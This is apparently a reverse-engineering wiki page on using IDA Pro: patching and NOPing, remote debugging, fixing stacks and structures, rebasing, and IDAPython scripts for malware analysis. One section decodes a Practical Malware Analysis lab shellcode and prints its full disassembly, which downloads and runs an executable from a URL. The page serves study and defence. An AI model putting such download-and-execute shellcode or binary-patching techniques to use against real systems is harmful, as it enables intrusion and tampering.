IDA-Pro
Description and installation
Description
IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger.
Installation
Flavors
Recommended installation
It is recommended to install Python 2.7 first and then IDA Pro, to avoid errors with PySide.QtGui.
- Install Python 2.7.9 for Windows 7 x64.
- Install IDA Pro. When prompted, check "Install python 2.7". This ensures that IDA Pro supports Python.
- To install plugins, refer to this section.
Usage
Display opcodes
If you want to display opcodes along with the assembly, go to Options > General and fill in the "Number of opcode bytes" as follows:
Here is the result once the option is applied:
Patching
Patch code from IDA
You can patch an executable from IDA Pro directly. Go to the location you want to patch, right click and make sure Hex view is synchronized:
From the IDA View, click on the instruction to modify and go to the Hex view. Right click on the byte to modify and select "Edit" from the menu:
Make your modification, right click on the byte and select "Commit changes" or press F2.
Now, go to File > Produce File > Create DIF file:
Download idadif.py (http://stalkr.net/files/ida/idadif.py) and run it as follows:
C:\tools>idadif.py e7bc5d2c0cf4480348f5504196561297.patched.2 e7bc5d2c0cf4480348f5504196561297.patched.dif
Patching file 'e7bc5d2c0cf4480348f5504196561297.patched.2' with 'e7bc5d2c0cf4480348f5504196561297.patched.dif'
Done
You can check the differences using the fc utility:
C:\tools>fc /b e7bc5d2c0cf4480348f5504196561297.init e7bc5d2c0cf4480348f5504196561297.patched.2
Comparing files e7bc5d2c0cf4480348f5504196561297.init and E7BC5D2C0CF4480348F5504196561297.PATCHED.2
0001F21C: 74 EB
The above output means that, at file offset 0x1F21C, the byte 74 (opcode of a short jz) has been replaced by EB (opcode of a short jmp).
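The idea behind applying a DIF file can be sketched in a few lines of plain Python 3, run outside IDA. This is a minimal sketch and not the code of idadif.py: it assumes that each patch line has the form OFFSET: OLD NEW in hexadecimal (the same layout as the fc output above) and that any other line (header, file name, blank line) can be skipped. The function name apply_dif and the sample buffer are hypothetical.

```python
import re

# One patch line, e.g. "0001F21C: 74 EB" (assumed DIF line format).
PATCH_LINE = re.compile(r"^([0-9A-Fa-f]+):\s+([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})$")

def apply_dif(data, dif_text):
    """Return a patched copy of `data` (bytes) according to `dif_text`.

    Lines that do not look like "OFFSET: OLD NEW" are ignored.
    A ValueError is raised when the byte found at OFFSET is not OLD.
    """
    patched = bytearray(data)
    for line in dif_text.splitlines():
        match = PATCH_LINE.match(line.strip())
        if not match:
            continue  # header, file name or blank line
        offset = int(match.group(1), 16)
        old = int(match.group(2), 16)
        new = int(match.group(3), 16)
        if patched[offset] != old:
            raise ValueError("unexpected byte at offset 0x%X" % offset)
        patched[offset] = new
    return bytes(patched)

# Hypothetical 4-byte "file" whose second byte is a short jz (0x74).
original = bytes([0x90, 0x74, 0x05, 0xC3])
dif = "(header line)\n\nsample.exe\n00000001: 74 EB\n"
print(apply_dif(original, dif).hex())
```

Checking the old byte before writing the new one guards against applying a DIF file to the wrong binary.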
NOPing out instructions
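The Python script below helps to NOP out instructions in IDA Pro: it overwrites the instruction under the cursor with NOP bytes (0x90). It also binds itself to the Alt+N key combination.
import idaapi
from idc import *  # AddHotkey, ScreenEA, NextHead, PatchByte, Jump, Refresh

# Register an IDC wrapper so that Alt+N calls the Python function below
idaapi.CompileLine('static n_key() { RunPythonStatement("nopIt()"); }')
AddHotkey("Alt-N", "n_key")

def nopIt():
    start = ScreenEA()          # address of the instruction under the cursor
    end = NextHead(start)       # address of the next instruction
    for ea in range(start, end):
        PatchByte(ea, 0x90)     # overwrite every byte of the instruction with NOP
    Jump(end)                   # move the cursor to the next instruction
    Refresh()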
Given the below extract, we see at location 0x401215 a jump to itself:
Place the cursor at offset 0x401215 and press D to convert the block to DATA. Then place the cursor at location 0x401216 and press C to convert the block to CODE.
You should now have the below screen.
Place your cursor at offset 0x401215, start the python script (File > Script file...). Press Alt+N to NOP out the byte.
So that IDA Pro displays the function properly, press C to convert the byte to CODE:
Remote debugger
Description
There are situations where you will find it useful to use the IDA remote debugger (e.g. to debug a remote ELF running on Linux from IDA Pro installed on a Windows virtual machine).
linux_serverx64
Server part
To do that, go to your IDA installation folder and find the appropriate debugger that will run on the remote server:
File name            Target system      Debugged programs
-------------------  -----------------  -----------------
android_server       ARM Android        32-bit ELF files
armlinux_server      ARM Linux          32-bit ELF files
armuclinux_server    ARM UCLinux        32-bit ELF files
linux_server         Linux 32-bit       32-bit ELF files
linux_serverx64      Linux 64-bit       64-bit ELF files
mac_server           Mac OS X           32-bit Mach-O files
mac_serverx64        Mac OS X           64-bit Mach-O files
win32_remote.exe     MS Windows 32-bit  32-bit PE files
win64_remotex64.exe  MS Windows 64-bit  64-bit PE files
wince_remote.dll     Windows CE         32-bit PE files
In our case, we will debug a 64bit ELF. Hence, we will copy linux_serverx64 to the remote host. Once done, start it as follows:
$ ./linux_serverx64 -PmyAwesomePassword
IDA Linux 64-bit remote debug server(ST) v1.14. Hex-Rays (c) 2004-2011
Listening on port #23946...
Available options are:
- -p<port>: port number (defaults to 23946/tcp)
- -P<password>: password
- -v: verbose
Client configuration
Now, let's open IDA Pro and go to Debugger > Run > Remote Linux debugger:
And configure the screen as follows:
You should have the following screen:
Usual commands for debugging:
- F9: run
- F2: breakpoint
- g: go to offset
- F7: step in
- F8: step over
android_server
Refer to this page.
Fix function stack
There are cases where IDA fails to interpret the size of a variable and you need to fix the stack. In the example below, IDA did not realize that the buffer is 512 bytes long and displayed a local variable labeled var_20C instead:
To fix that, press Ctrl + K or go to Edit > Functions > Stack variables, right click on the first byte of buffer and select "array" from the menu:
Enter 512 in the Array size field and click OK.
Once this modification is applied, back in the IDA View, we can see that the buffer is now properly labeled:
Add a standard structure
Example 1: IWebBrowser2
There are cases where you will need to add a standard structure. In the below example, we see a call to CoCreateInstance at offset 0x401022:
The clsid identifies Internet Explorer (see details) and the riid corresponds to the IWebBrowser2 interface:
But if we want to know which function is called, we have to add the structure. To do that, go to the Structures tab and press the Insert key. When prompted, enter the structure name, following the pattern InterfaceNameVtbl, where InterfaceName is IWebBrowser2 in our case (i.e. IWebBrowser2Vtbl).
In the below code extract, we can see that the reference to the COM object is stored on the stack and moved to EAX at offset 0x40105C. EAX is dereferenced at 0x401065 and EDX points to the beginning of the COM object.
To know what function is called at 0x401074, right click on the offset (0x2C). It appears that it corresponds to the Navigate function:
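The link between offset 0x2C and Navigate can be checked by hand: in a 32-bit process every vtable entry is a 4-byte pointer, so offset 0x2C selects entry 0x2C / 4 = 11. The sketch below (plain Python 3, outside IDA) lists the first twelve entries of the IWebBrowser2 vtable in inheritance order (IUnknown, IDispatch, then IWebBrowser). The helper name method_at is hypothetical.

```python
POINTER_SIZE = 4  # size of one vtable entry in a 32-bit process

# First entries of the IWebBrowser2 vtable, in declaration order.
IWEBBROWSER2_VTBL_HEAD = [
    "QueryInterface", "AddRef", "Release",                         # IUnknown
    "GetTypeInfoCount", "GetTypeInfo", "GetIDsOfNames", "Invoke",  # IDispatch
    "GoBack", "GoForward", "GoHome", "GoSearch", "Navigate",       # IWebBrowser
]

def method_at(offset, vtbl=IWEBBROWSER2_VTBL_HEAD, pointer_size=POINTER_SIZE):
    """Return the method name stored at byte `offset` of the vtable."""
    if offset % pointer_size:
        raise ValueError("offset is not aligned on a vtable entry")
    return vtbl[offset // pointer_size]

print(method_at(0x2C))  # Navigate
```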
Example 2: AT_INFO
In the following example (Lab 09-03 from the Practical Malware Analysis book), we have to deal with the AT_INFO structure in the DLL3.dll file:
In DLL3.dll, go to the Structures window, press the Insert key, and add the AT_INFO structure:
The DLL3GetStructure function returns a pointer to the dword_1000B0A0 global variable which is defined in DllMain:
Go to dword_1000B0A0 in memory, select Edit > Struct var... from the menu, and select the AT_INFO structure previously added:
Back to DllMain, the code is now much more readable:
Load with manual Image base address
Manual load
In case you're analyzing a DLL that has been rebased, you will need to manually load the DLL into IDA Pro. To do that, ensure the Manual load option is checked when you're loading the DLL:
You're then prompted to enter the new address:
Rebasing
If the malware is already opened in IDA-Pro, you can rebase it by going to Edit > Segments > Rebase program... and specifying a new address. Below is an example of a malicious driver we want to rebase. The default image base is 0x10000 but we know the driver is loaded at address 0xf7be9000. Let's modify the window as follows:
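Rebasing only shifts every address by the difference between the two image bases, which makes it easy to map an address seen in a debugger or memory dump back to the listing by hand. A minimal sketch in plain Python 3 follows. The function name rebase and the sample address 0x10486 are hypothetical, and only the two base addresses come from the example above.

```python
def rebase(address, old_base, new_base):
    """Translate `address` from an image loaded at old_base to new_base."""
    return address - old_base + new_base

OLD_BASE = 0x10000      # default image base shown by IDA
NEW_BASE = 0xF7BE9000   # address where the driver is actually loaded

# Hypothetical address inside the driver, as displayed before rebasing.
print(hex(rebase(0x10486, OLD_BASE, NEW_BASE)))  # 0xf7be9486
```

Swapping the two bases performs the reverse translation, from a run-time address back to the address in the unrebased database.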
Graphing of several functions
To make a graph of several functions, select the functions or a portion of code and select the desired graph type (from, to, ...). Below is an example. Suppose we want to highlight the relationship between WinINet functions. Let's select several functions and click "Xref Graph to".
Add missing cross references
There are situations where IDA Pro won't be able to detect all cross references (e.g. function pointers). To add missing cross references, use the AddCodeXref IDC function, which is also available from IDAPython:
AddCodeXref(loc_from, loc_to, flow_type);
The three parameters are:
- the location the reference is from
- the location the reference is to
- flow type: fl_CF (normal call instruction) or fl_JF (jump instruction)
Convert bytes to DWORDs
We have just decrypted a shellcode into IDA-Pro and we have defined the decrypted stub as CODE (C). However, there are some bytes at the end of the code which are actually DWORDs. They do correspond to shellcode function hashes, as explained here:
To convert these bytes, let's first define them as individual arrays with a size of 4 (press * on the numpad or right click and select Array):
Once this is done, press D twice on each of these arrays to convert them to DWORDs:
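What IDA does when four bytes become one DWORD is a little-endian read: the first byte in memory is the least significant one. The sketch below shows this in plain Python 3, outside IDA. The function name bytes_to_dwords is hypothetical, and the sample bytes are illustrative values taken from two push instructions of the decoded shellcode listing in the "Decode shellcode" section.

```python
import struct

def bytes_to_dwords(raw):
    """Interpret `raw` as consecutive little-endian 32-bit values."""
    if len(raw) % 4:
        raise ValueError("length must be a multiple of 4")
    return list(struct.unpack("<%dI" % (len(raw) // 4), raw))

raw = bytes([0x8E, 0x4E, 0x0E, 0xEC, 0x98, 0xFE, 0x8A, 0x0E])
print(["0x%08X" % d for d in bytes_to_dwords(raw)])
# ['0xEC0E4E8E', '0x0E8AFE98']
```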
Plugins
IDA Python Scripting
List of IDC functions
The complete list of IDC functions can be found here.
setcolorssiko.py
You can use the following python script to highlight:
- Call functions
- Non-zeroing XORs (data encoding)
- sidt, sldt, sgdt, smsw, str, in, cpuid (Anti-VM instructions)
- int 3, int 2D, icebp, rdtsc (Anti-Debugging instructions)
- push/ret combinations (return address abuse)
The script is also available here.
from idautils import *
from idc import *

#Color the Calls off-white
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
funcCalls = []
for i in heads:
    if GetMnem(i) == "call":
        funcCalls.append(i)
print "Number of calls: %d" % (len(funcCalls))
for i in funcCalls:
    SetColor(i, CIC_ITEM, 0xc7fdff)

#Color Anti-VM instructions Red and print their location
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
antiVM = []
for i in heads:
    if (GetMnem(i) == "sidt" or GetMnem(i) == "sgdt" or GetMnem(i) == "sldt" or GetMnem(i) == "smsw" or GetMnem(i) == "str" or GetMnem(i) == "in" or GetMnem(i) == "cpuid"):
        antiVM.append(i)
print "Number of potential Anti-VM instructions: %d" % (len(antiVM))
for i in antiVM:
    print "Anti-VM potential at %x" % i
    SetColor(i, CIC_ITEM, 0x0000ff)

#Color non-zeroing out xor instructions Orange
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
xor = []
for i in heads:
    if GetMnem(i) == "xor":
        if (GetOpnd(i,0) != GetOpnd(i,1)):
            xor.append(i)
print "Number of xor: %d" % (len(xor))
for i in xor:
    SetColor(i, CIC_ITEM, 0x00a5ff)
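The selection logic of the script can be tried outside IDA on plain (mnemonic, operands) tuples. The sketch below, in plain Python 3, is a simplified model and not part of setcolorssiko.py. The function name classify and the sample instructions are hypothetical. It shows in particular why xor eax, eax is ignored: an XOR of a register with itself only zeroes the register, whereas an XOR with different operands may be data encoding.

```python
ANTI_VM = {"sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"}

def classify(mnemonic, operands=()):
    """Return the highlight category for one instruction, or None."""
    if mnemonic == "call":
        return "call"
    if mnemonic in ANTI_VM:
        return "anti-vm"
    # A XOR is only interesting when both operands differ.
    if mnemonic == "xor" and len(operands) == 2 and operands[0] != operands[1]:
        return "non-zeroing-xor"
    return None

samples = [
    ("xor", ("eax", "eax")),      # zeroing idiom, not highlighted
    ("xor", ("al", "66h")),       # possible decoding loop
    ("cpuid", ()),
    ("call", ("sub_401000",)),
]
for mnem, ops in samples:
    print(mnem, ops, classify(mnem, ops))
```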
Decode XOR strings
You can use Python scripts to decode strings (e.g. XOR'ed strings) in IDA. Here is an extract of a shellcode that decodes an XOR'ed stub:
To decode the XOR'ed stub, we have to patch each byte by XOR'ing with 0x66. To do that, we can use a custom python script as follows:
# decode-xor.py
loc = 0x18FD68                      # Start offset of XOR'ed stub
for i in range(0x1DF):              # Loop over offsets 0x00-0x1DE (0x1DF bytes)
    b = Byte(loc+i)                 # We save each byte in b
    decoded_byte = b ^ 0x66         # XOR byte with 0x66
    PatchByte(loc+i, decoded_byte)  # Patch each byte with decoded byte
Go to File > Script file... and select decode-xor.py.
IDA will update your code as follows:
You can select the entire block and press the A key to display the string:
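The same single-byte XOR can be tested outside IDA before patching the database. The sketch below is plain Python 3. The function name xor_decode and the sample string are hypothetical, and only the key 0x66 comes from the text above. Since XOR is its own inverse, the same function encodes and decodes.

```python
def xor_decode(data, key=0x66):
    """XOR every byte of `data` with the single-byte `key`."""
    return bytes(b ^ key for b in data)

plain = b"cmd.exe"              # hypothetical plaintext
encoded = xor_decode(plain)     # what the encoded stub would contain
print(encoded.hex())
print(xor_decode(encoded))      # decoding restores the original bytes
```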
Decode shellcode
Description
Let's take the Lab19-01.bin shellcode from the Practical Malware Analysis book and see how we can decode the encrypted part with a Python script.
First of all, we need to identify the shellcode sections:
Section | Address range |
---|---|
NOP sled | 0x00000000 - 0x000001FF |
Decoding stub | 0x00000200 - 0x00000223 |
Encrypted stub | 0x00000224 - 0x000003B0 |
For more information regarding the identification of the sections, refer to this section.
The decryption routine is relatively simple to understand:
seg000:00000200 33 C9 xor ecx, ecx
seg000:00000202 66 B9 8D 01 mov cx, 18Dh ; Size of encrypted stub
seg000:00000206 EB 17 jmp short loc_21F
seg000:00000208
seg000:00000208 ; =============== S U B R O U T I N E =======================================
seg000:00000208
seg000:00000208
seg000:00000208 decode_shellcode proc near
seg000:00000208 5E pop esi ; used as CALL/POP to get address of EIP
seg000:00000209 56 push esi ; push EIP to stack to pass control to decrypted content via retn
seg000:0000020A 8B FE mov edi, esi
seg000:0000020C
seg000:0000020C loc_20C: ; loop thru all bytes of encrypted stub
seg000:0000020C AC lodsb ; 1st character transform
seg000:0000020D 8A D0 mov dl, al
seg000:0000020F 80 EA 41 sub dl, 41h ; 'A' ; subtract 0x41
seg000:00000212 C0 E2 04 shl dl, 4 ; and shift left by 4
seg000:00000215 AC lodsb ; 2nd character transform
seg000:00000216 2C 41 sub al, 41h ; 'A' ; subtract 0x41
seg000:00000218 02 C2 add al, dl ; sum of both transformations
seg000:0000021A AA stosb ; patch byte with result of transformation
seg000:0000021B 49 dec ecx
seg000:0000021C 75 EE jnz short loc_20C ; end of loop
seg000:0000021E C3 retn
seg000:0000021E decode_shellcode endp
seg000:0000021E
seg000:0000021F ; ---------------------------------------------------------------------------
seg000:0000021F
seg000:0000021F loc_21F: ; CODE XREF: seg000:00000206↑j
seg000:0000021F E8 E4 FF FF FF call decode_shellcode
Once the sections have been defined and the decryption routine has been understood, we can create a Python script that decodes the bytes exactly as the shellcode would do at run time.
Script
def shl(dest, count):
    # Emulate an 8-bit SHL: bits shifted out of the byte are discarded
    return (dest << count) & 0xFF

def transform_pair(c1, c2):
    # subtract 0x41 from the 1st character and shift left by 4
    c1 = shl(c1 - 0x41, 4)
    # subtract 0x41 from the 2nd character (8-bit arithmetic)
    c2 = (c2 - 0x41) & 0xFF
    # return the 8-bit sum of both transforms
    return (c1 + c2) & 0xFF

# Start of the encrypted stub
loc = 0x00000224
# Each decoded byte is built from two consecutive encoded bytes
for i in range(0x18D):
    b1 = Byte(loc+i*2)
    b2 = Byte(loc+i*2+1)
    decoded_byte = transform_pair(b1, b2)
    PatchByte(loc+i, decoded_byte)
    SetColor(loc+i, CIC_ITEM, 0xF8FFB0)
Launch the script from File > Script file....
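The decoding routine can also be checked outside IDA on a plain byte string. The sketch below is plain Python 3 and mirrors the assembly loop (two encoded bytes give one decoded byte, with 8-bit arithmetic). The function name decode_pairs is hypothetical, and the input IJOF is a constructed example, not bytes copied from Lab19-01.bin.

```python
def decode_pairs(encoded):
    """Decode pairs of bytes: ((c1 - 0x41) << 4) + (c2 - 0x41), modulo 256."""
    out = bytearray()
    for i in range(0, len(encoded) - 1, 2):
        high = ((encoded[i] - 0x41) << 4) & 0xFF   # sub dl, 41h / shl dl, 4
        low = (encoded[i + 1] - 0x41) & 0xFF       # sub al, 41h
        out.append((high + low) & 0xFF)            # add al, dl
    return bytes(out)

# 'I','J' -> 0x89 and 'O','F' -> 0xE5, i.e. the bytes of "mov ebp, esp".
print(decode_pairs(b"IJOF").hex())  # 89e5
```

Masking with 0xFF after each step keeps the results identical to what the 8-bit registers dl and al would hold.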
Arrange code/data
Now, we still need to manually arrange the code, using:
- U for undefined,
- D for data,
- C for code,
- A for ascii.
Below is the result of the fully decoded shellcode:
seg000:00000224 89 E5 mov ebp, esp
seg000:00000226 81 EC 40 00 00 00 sub esp, 40h
seg000:0000022C E9 33 01 00 00 jmp loc_364
seg000:00000231
seg000:00000231 ; =============== S U B R O U T I N E =======================================
seg000:00000231
seg000:00000231
seg000:00000231 sub_231 proc near ; CODE XREF: sub_252+1F↓p
seg000:00000231
seg000:00000231 arg_0 = dword ptr 4
seg000:00000231
seg000:00000231 56 push esi
seg000:00000232 57 push edi
seg000:00000233 8B 74 24 0C mov esi, [esp+8+arg_0]
seg000:00000237 31 FF xor edi, edi
seg000:00000239 FC cld
seg000:0000023A
seg000:0000023A loc_23A: ; CODE XREF: sub_231+15↓j
seg000:0000023A 31 C0 xor eax, eax
seg000:0000023C AC lodsb
seg000:0000023D 38 E0 cmp al, ah
seg000:0000023F 74 0A jz short loc_24B
seg000:00000241 C1 CF 0D ror edi, 0Dh
seg000:00000244 01 C7 add edi, eax
seg000:00000246 E9 EF FF FF FF jmp loc_23A
seg000:0000024B ; ---------------------------------------------------------------------------
seg000:0000024B
seg000:0000024B loc_24B: ; CODE XREF: sub_231+E↑j
seg000:0000024B 89 F8 mov eax, edi
seg000:0000024D 5F pop edi
seg000:0000024E 5E pop esi
seg000:0000024F C2 04 00 retn 4
seg000:0000024F sub_231 endp
seg000:0000024F
seg000:00000252
seg000:00000252 ; =============== S U B R O U T I N E =======================================
seg000:00000252
seg000:00000252
seg000:00000252 sub_252 proc near ; CODE XREF: sub_2BF+E↓p
seg000:00000252 ; sub_2BF+1C↓p ...
seg000:00000252
seg000:00000252 var_4 = dword ptr -4
seg000:00000252 arg_0 = dword ptr 4
seg000:00000252 arg_4 = dword ptr 8
seg000:00000252
seg000:00000252 60 pusha
seg000:00000253 8B 6C 24 24 mov ebp, [esp+20h+arg_0]
seg000:00000257 8B 45 3C mov eax, [ebp+3Ch]
seg000:0000025A 8B 54 05 78 mov edx, [ebp+eax+78h]
seg000:0000025E 01 EA add edx, ebp
seg000:00000260 8B 4A 18 mov ecx, [edx+18h]
seg000:00000263 8B 5A 20 mov ebx, [edx+20h]
seg000:00000266 01 EB add ebx, ebp
seg000:00000268
seg000:00000268 loc_268: ; CODE XREF: sub_252+28↓j
seg000:00000268 E3 2A jecxz short loc_294
seg000:0000026A 49 dec ecx
seg000:0000026B 8B 34 8B mov esi, [ebx+ecx*4]
seg000:0000026E 01 EE add esi, ebp
seg000:00000270 56 push esi
seg000:00000271 E8 BB FF FF FF call sub_231
seg000:00000276 3B 44 24 28 cmp eax, [esp+20h+arg_4]
seg000:0000027A 75 EC jnz short loc_268
seg000:0000027C 8B 5A 24 mov ebx, [edx+24h]
seg000:0000027F 01 EB add ebx, ebp
seg000:00000281 66 8B 0C 4B mov cx, [ebx+ecx*2]
seg000:00000285 8B 5A 1C mov ebx, [edx+1Ch]
seg000:00000288 01 EB add ebx, ebp
seg000:0000028A 8B 04 8B mov eax, [ebx+ecx*4]
seg000:0000028D 01 E8 add eax, ebp
seg000:0000028F E9 02 00 00 00 jmp loc_296
seg000:00000294 ; ---------------------------------------------------------------------------
seg000:00000294
seg000:00000294 loc_294: ; CODE XREF: sub_252:loc_268↑j
seg000:00000294 31 C0 xor eax, eax
seg000:00000296
seg000:00000296 loc_296: ; CODE XREF: sub_252+3D↑j
seg000:00000296 89 44 24 1C mov [esp+20h+var_4], eax
seg000:0000029A 61 popa
seg000:0000029B C2 08 00 retn 8
seg000:0000029B sub_252 endp
seg000:0000029B
seg000:0000029E
seg000:0000029E ; =============== S U B R O U T I N E =======================================
seg000:0000029E
seg000:0000029E
seg000:0000029E sub_29E proc near ; CODE XREF: sub_2BF+1↓p
seg000:0000029E 56 push esi
seg000:0000029F 31 C0 xor eax, eax
seg000:000002A1 64 8B 40 30 mov eax, fs:[eax+30h]
seg000:000002A5 85 C0 test eax, eax
seg000:000002A7 78 0F js short loc_2B8
seg000:000002A9 8B 40 0C mov eax, [eax+0Ch]
seg000:000002AC 8B 70 1C mov esi, [eax+1Ch]
seg000:000002AF AD lodsd
seg000:000002B0 8B 40 08 mov eax, [eax+8]
seg000:000002B3 E9 05 00 00 00 jmp loc_2BD
seg000:000002B8 ; ---------------------------------------------------------------------------
seg000:000002B8
seg000:000002B8 loc_2B8: ; CODE XREF: sub_29E+9↑j
seg000:000002B8 ; sub_29E:loc_2B8↓j
seg000:000002B8 E9 FB FF FF FF jmp loc_2B8
seg000:000002BD ; ---------------------------------------------------------------------------
seg000:000002BD
seg000:000002BD loc_2BD: ; CODE XREF: sub_29E+15↑j
seg000:000002BD 5E pop esi
seg000:000002BE C3 retn
seg000:000002BE sub_29E endp
seg000:000002BE
seg000:000002BF
seg000:000002BF ; =============== S U B R O U T I N E =======================================
seg000:000002BF
seg000:000002BF
seg000:000002BF sub_2BF proc near ; CODE XREF: sub_2BF:loc_364↓p
seg000:000002BF 5B pop ebx
seg000:000002C0 E8 D9 FF FF FF call sub_29E
seg000:000002C5 89 C2 mov edx, eax
seg000:000002C7 68 8E 4E 0E EC push 0EC0E4E8Eh
seg000:000002CC 52 push edx
seg000:000002CD E8 80 FF FF FF call sub_252
seg000:000002D2 89 45 FC mov [ebp-4], eax
seg000:000002D5 68 C1 79 E5 B8 push 0B8E579C1h
seg000:000002DA 52 push edx
seg000:000002DB E8 72 FF FF FF call sub_252
seg000:000002E0 89 45 F8 mov [ebp-8], eax
seg000:000002E3 68 83 B9 B5 78 push 78B5B983h
seg000:000002E8 52 push edx
seg000:000002E9 E8 64 FF FF FF call sub_252
seg000:000002EE 89 45 F4 mov [ebp-0Ch], eax
seg000:000002F1 68 E6 17 8F 7B push 7B8F17E6h
seg000:000002F6 52 push edx
seg000:000002F7 E8 56 FF FF FF call sub_252
seg000:000002FC 89 45 F0 mov [ebp-10h], eax
seg000:000002FF 68 98 FE 8A 0E push 0E8AFE98h
seg000:00000304 52 push edx
seg000:00000305 E8 48 FF FF FF call sub_252
seg000:0000030A 89 45 EC mov [ebp-14h], eax
seg000:0000030D 8D 03 lea eax, [ebx]
seg000:0000030F 50 push eax
seg000:00000310 FF 55 FC call dword ptr [ebp-4]
seg000:00000313 68 36 1A 2F 70 push 702F1A36h
seg000:00000318 50 push eax
seg000:00000319 E8 34 FF FF FF call sub_252
seg000:0000031E 89 45 E8 mov [ebp-18h], eax
seg000:00000321 68 80 00 00 00 push 80h ; 'Ç'
seg000:00000326 8D 7B 48 lea edi, [ebx+48h]
seg000:00000329 57 push edi
seg000:0000032A FF 55 F8 call dword ptr [ebp-8]
seg000:0000032D 01 C7 add edi, eax
seg000:0000032F C7 07 5C 31 2E 65 mov dword ptr [edi], 652E315Ch
seg000:00000335 C7 47 04 78 65 00 00 mov dword ptr [edi+4], 6578h
seg000:0000033C 31 C9 xor ecx, ecx
seg000:0000033E 51 push ecx
seg000:0000033F 51 push ecx
seg000:00000340 8D 43 48 lea eax, [ebx+48h]
seg000:00000343 50 push eax
seg000:00000344 8D 43 07 lea eax, [ebx+7]
seg000:00000347 50 push eax
seg000:00000348 51 push ecx
seg000:00000349 FF 55 E8 call dword ptr [ebp-18h]
seg000:0000034C 68 05 00 00 00 push 5
seg000:00000351 8D 43 48 lea eax, [ebx+48h]
seg000:00000354 50 push eax
seg000:00000355 FF 55 EC call dword ptr [ebp-14h]
seg000:00000358 FF 55 F0 call dword ptr [ebp-10h]
seg000:0000035B 68 00 00 00 00 push 0
seg000:00000360 50 push eax
seg000:00000361 FF 55 F4 call dword ptr [ebp-0Ch]
seg000:00000364
seg000:00000364 loc_364: ; CODE XREF: seg000:0000022C↑j
seg000:00000364 E8 56 FF FF FF call sub_2BF
seg000:00000364 sub_2BF endp ; sp-analysis failed
seg000:00000364
seg000:00000364 ; ---------------------------------------------------------------------------
seg000:00000369 55 52 4C 4D 4F 4E 00 aUrlmon db 'URLMON',0
seg000:00000370 68 74 74 70 3A 2F 2F 77+aHttpWww_practi db 'http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe',0
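In the listing above, sub_231 computes a 32-bit hash of a null-terminated string (rotate the accumulator right by 0Dh bits, then add the next character), and sub_252 compares that hash with the constants pushed in sub_2BF. The sketch below reproduces the hash in plain Python 3, outside IDA, so that candidate API names can be matched against those constants. The function names ror32 and ror13_hash are hypothetical, and the list of candidate names is an assumption made for the example.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name):
    """Hash used by sub_231: ror edi, 0Dh then add edi, eax for each character."""
    h = 0
    for ch in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + ch) & 0xFFFFFFFF
    return h

# Candidate export names (assumed), to compare with the pushed constants.
for api in ("LoadLibraryA", "WinExec"):
    print("%-14s 0x%08X" % (api, ror13_hash(api)))
```

With these two candidates, WinExec hashes to 0x0E8AFE98 (pushed at 0x2FF) and LoadLibraryA to 0xEC0E4E8E (pushed at 0x2C7).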
Convert bytes to IP address
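The following script reads the four bytes that follow the byte at the current position (note the +1 offset, which skips the byte under the cursor), formats them as a dotted IP address and adds the result as a comment at the current position: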
# Convert to IP address
loc = ScreenEA()
MakeComm(loc, '.'.join([str(Byte(loc+i+1)) for i in range(4)]))
Below is an example:
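As a separate illustration outside IDA, the conversion itself can be sketched in plain Python 3. The function name bytes_to_ip and the sample address are hypothetical.

```python
def bytes_to_ip(raw):
    """Format 4 raw bytes as a dotted-quad IPv4 address string."""
    if len(raw) != 4:
        raise ValueError("an IPv4 address is exactly 4 bytes long")
    return ".".join(str(b) for b in bytearray(raw))

print(bytes_to_ip(bytes([192, 168, 1, 10])))  # 192.168.1.10
```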
Keywords: IDA-Pro reverse-engineering disassembler malware-analysis